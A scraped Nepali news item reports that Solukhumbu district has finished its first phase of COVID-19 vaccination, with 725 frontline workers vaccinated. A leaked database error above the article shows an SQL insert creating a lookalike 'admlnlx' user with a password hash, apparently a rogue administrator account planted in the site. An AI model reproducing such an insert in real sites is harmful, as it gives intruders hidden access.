WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BR2j.eD2A.jUQZAvHI.HA10coKTSBq/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:24:54', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लामा पहिलो चरणको कोरोना (कोभिड-१९) विरुद्धको खोप अभियान सकिएकोे छ । माघ १५ गतेबाट सुरु भएको पहिलो चरणको खोप अभियान सबै स्थानिय तहमा सकिएको जन स्वास्थ्य कार्यलय सोलुखुम्बुले जनाएको छ ।
कोरोना (कोभिड–१९) रोकथाम तथा नियन्त्रणका क्रममा अग्रपंक्तीमा खटिएका स्वास्थ्यकर्मी, महिला स्वास्थ्य स्वयंसेविका, एम्बूलेन्स चालक तथा सरसफाईमा संलग्न कर्मचारी गरी ७ सय २५ जनालाई खोप लगाइएको कार्यालयले जनाएको छ ।